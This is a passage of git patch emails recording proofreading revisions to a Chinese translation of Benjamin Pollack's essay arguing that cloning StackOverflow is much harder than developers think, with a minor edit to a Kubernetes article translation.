+所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 + +via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ + +作者:Benjamin Pollack 译者:hopefully2333 校对:yunfengHe + +本文由 LCTT 原创编译,Linux中国 荣誉推出 diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index 30e796cb8a..e4008b8256 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,4 +1,5 @@ 因为这个,我找 Hacker News 期刊理论了一番 +============================================================ 实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? 不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 @@ -29,7 +30,7 @@ 正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也正是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 - +```SQL create table QUESTION (ID identity primary key, TITLE varchar(255), --- 为什么我知道你认为是 255 BODY text, @@ -42,6 +43,7 @@ create table RESPONSE (ID identity primary key, DOWNVOTES integer not null default 0, QUESTION integer references QUESTION(ID)) +``` 如果你让这些开发者去实现 Stack Overflow,进入他脑海中的就是上面的两个SQL表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 @@ -60,6 +62,8 @@ create table RESPONSE (ID identity primary key, 所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 +------------------------------------------------------------------------------- + via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ 作者:Benjamin Pollack 译者:hopefully2333 校对:yunfengHe From d208c6274a8459ecb33853c7ab609877cea07f63 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 00:24:36 +0800 Subject: [PATCH 0563/1627] v2 --- .../tech/20090701 The One in Which I Call Out Hacker News.md | 2 +- .../tech/20171120 Containers and Kubernetes Whats next.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index e4008b8256..f0e58889eb 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,7 +1,7 @@ 因为这个,我找 Hacker News 期刊理论了一番 ============================================================ -实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +> 实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? 不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 - 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index 5ed099c170..759887dbd2 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -1,6 +1,6 @@ 容器技术和 k8s 的下一站: ============================================================ -### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 +### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 ![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") From 8c657393d102f174bc39c896c17ada913c49ea82 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 00:38:32 +0800 Subject: [PATCH 0564/1627] =?UTF-8?q?=E6=A0=A1=E5=AF=B9=E7=89=88=E6=9C=ACv?= =?UTF-8?q?3=20Yunfeng=20He?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...01 The One in Which I Call Out Hacker News.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index f0e58889eb..da55b85e6a 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -7,24 +7,24 @@ 指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个StackOverflow可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个 StackOverflow 可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 -秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词(也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少80个小时的时间。 +秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 (也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭源 StackOverflow 代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 -好的,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧* +好的,我知道你在听到这些假设的时候已经开始觉得泄气了。你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧。 好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统来显示大家对某个答案是赞同还是反对。只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 -除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 slashdot,reddit 或是 StackOverflow 这些动作影响到。 +除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 在这之后!你会以为你基本已经大功告成了! -...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的CSS设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 +...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? @@ -45,11 +45,11 @@ create table RESPONSE (ID identity primary key, ``` -如果你让这些开发者去实现 Stack Overflow,进入他脑海中的就是上面的两个SQL表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 +如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 -但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 Stackoverflow 的源码之后,我得以印证了自己的想法,Stackoverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 +但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 -这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 Stack Overflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) 同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计 - 即要求用户必须拥有一个 OpenID 并知道如何使用它 - 在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 From 4cfbabdfb1e79e9e6bc23fe6896b2b8b692da084 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 00:45:39 +0800 Subject: [PATCH 0565/1627] =?UTF-8?q?v4=20=E5=B7=B2=E6=A0=A1=E5=AF=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20090701 The One in Which I Call Out Hacker News.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index da55b85e6a..f47f475363 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -7,7 +7,7 @@ 指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个 StackOverflow 可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现和一个和 StackOverflow 一样的系统可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 (也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 @@ -28,7 +28,7 @@ 那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? -正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也正是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 ```SQL create table QUESTION (ID identity primary key, From d9b3a67c138a65e1a4db119660ce256f4e75f62d Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 02:04:19 +0800 Subject: [PATCH 0566/1627] v5 --- ...The One in Which I Call Out Hacker News.md | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index f47f475363..f2b06ae23a 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -2,25 +2,25 @@ ============================================================ > 实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 +不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。 - 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现和一个和 StackOverflow 一样的系统可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现和一个和 StackOverflow 一样的系统可以简单到爆,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 -秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 (也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 +秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 (也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 -或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭源 StackOverflow 代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 +或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 好的,我知道你在听到这些假设的时候已经开始觉得泄气了。你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧。 -好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统来显示大家对某个答案是赞同还是反对。只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 +好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 -除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 +除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 在这之后!你会以为你基本已经大功告成了! @@ -28,7 +28,7 @@ 那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? -正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 